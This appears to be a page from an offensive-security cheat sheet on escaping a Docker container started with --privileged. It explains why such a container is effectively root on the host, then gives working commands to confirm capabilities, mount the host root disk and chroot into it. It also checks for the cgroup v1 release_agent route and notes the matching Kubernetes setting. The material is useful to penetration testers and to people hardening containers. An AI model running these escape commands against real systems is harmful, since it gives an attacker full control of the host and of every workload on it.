--privileged is the single most common escape. It gives the container all capabilities, access to every host device under /dev, and an unconfined seccomp and AppArmor profile. With all three, the container is root on the host in every way that matters; the only step left is to pick a route out.
# Confirm: full device list visible and a fat capability set
ls /dev | head; capsh --print | grep -i 'cap_sys_admin'
# Mount the host disk and chroot in
fdisk -l 2>/dev/null # find the host root device, e.g. /dev/sda1
mkdir -p /mnt/host && mount /dev/sda1 /mnt/host && chroot /mnt/host sh
If mounting the disk is awkward, the cgroup release_agent route works from any privileged container:
# release_agent needs a MOUNTABLE cgroup v1 hierarchy (absent on cgroup v2-only hosts)
mount -t cgroup -o rdma cgroup /tmp/cg 2>/dev/null && echo "v1 release_agent available" || echo "no v1 hierarchy; mount the host disk instead"
Exploitation notes#
- Privileged is a superset: anything under Capability abuse, Device access, and cgroups release_agent is available at once.
- Mounting the host block device is usually the quickest interactive route;
release_agentis the most reliable one-liner. - In Kubernetes this is
securityContext.privileged: true, the delivery view in Privileged pod.